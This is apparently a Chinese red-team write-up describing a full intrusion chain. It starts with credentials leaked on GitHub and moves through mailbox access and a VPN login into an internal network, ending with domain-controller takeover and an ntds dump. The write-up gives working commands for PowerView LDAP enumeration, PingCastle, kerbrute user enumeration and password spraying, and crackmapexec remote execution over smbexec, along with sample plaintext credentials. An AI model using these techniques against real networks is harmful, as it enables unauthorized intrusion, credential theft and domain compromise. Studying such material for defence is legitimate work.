从 Github 泄露到拨入 V*N 拿到域控

Delina

原文链接：从 Github 泄露到拨入 V*N 拿到域控
​
前言
目标资产信息搜集的程度，决定渗透过程的复杂程度。
目标主机信息搜集的深度，决定后渗透权限持续把控。
渗透的本质是信息搜集，而信息搜集整理为后续的情报跟进提供了强大的保证。
信息搜集
Github 信息搜集
对于 Github 很多 xdm 都是用来搜索 exp，poc ... ，其实 Github 上很多东西都能够为我们红队人员所利用，比如本篇通过 Github 泄露账号信息，拨入内网拿到域控。
首先通过 Github 搜索目标资产找到了目标的资产下的账号密码：
​
通过下载到本地，直接用泄露的 user、pass 登陆到目标邮件系统：
​
此时通过翻阅邮件内的消息找到了 V*N 的账号密码，并成功拨入 V*N：
​
​
随后直接进内网：
​
发现域控判断该域控为 xx 的域控，为子域控！
​
通过对该子域控进行信息搜集发现了 web 服务：

• 
  

<a class="FloatLeft Nav" href="http://172.16.172.121:7000/">统一身份认证管理</a><!--xxxxx,passwrod-->
通过域内用户枚举和密码喷洒攻击（Password Spraying）成功登陆：
​
​

1. 继续进行内网资产发现
   
2. 主域控
   
3. CN=xxxx-DC-2ND.xxxx.com.cn  172.16.172.81   12-34-56-78-9A-BC xxxx-DC-2nd.xxxx.com.cn [Win 2016 Standard 14393]
   
4. CN=xxxx-DC-1ST.xxxx.com.cn  172.16.172.80   12-34-56-78-9A-BC xxxx-DC-1st.xxxx.com.cn [Win 2016 Standard 14393]
   
5. 
   
6. 子域控
   
7. Found 172.16.172.82 IS_LDAP  172.16.172.82   12-34-56-78-9A-BC xxxx-JG-DC-1st.aaaa.xxxx.com.cn [Win 2016 Standard 14393]
   
8. Found 172.16.172.81 IS_LDAP
   
9. Found 172.16.172.83 IS_LDAP  172.16.172.83   12-34-56-78-9A-BC xxxx-JG-DC-2nd.aaaa.xxxx.com.cn [Win 2016 Standard 14393]

复制代码

直接通过凭证连接：​
连接到总部：
​
​
​
通过ldap导出机器，用户，域管，dc

1. Powerview 导出：
   
2. 
   
3. Get-NetDomainTrust -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred
   
4. Get-NetGroup -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name > group.txt
   
5. Get-NetComputer -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name
   
6. Get-NetUser -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name
   
7. 
   
8. PingCastle.exe --server 172.16.172.80 --user xxxx\ADadmin --password xxxx --protocol ADWSThenLDAP --healthcheck --explore-trust --explore-forest-trust

复制代码

​
针对域内用户，进行密码喷洒，尝试看看有没有相同的，通过域内用户枚举和密码喷洒攻击(Password Spraying) 发现有问题，暂时不用！
接下来的思路通过域外枚举域内：

1. kerbrute_windows_amd64.exe userenum --dc 172.16.172.80  -d xxxx.com.cn user.txt
   
2. kerbrute_windows_amd64.exe passwordspray --dc 172.16.172.80  -d xxxx.com.cn user.txt xxxx

复制代码

​
​
​
拿到域管后：

1. crackmapexec.exe -d xxxx -u ADadmin -p xxxx -t 10 172.16.172.0/24
   
2. crackmapexec.exe -d rootkit -u administrator -p admin!@#45 -t 1 192.168.3.144 --execm smbexec -x "whoami /user"
   
3. crackmapexec.exe -d xxxx -u ADadmin -p xxxx -t 10 ip.txt --execm smbexec -x "whoami /user"

复制代码

​
​
​
进入内网，上线直接横向域控，导出 ntds ... ... 至此域已经拿下，本次渗透结束！
​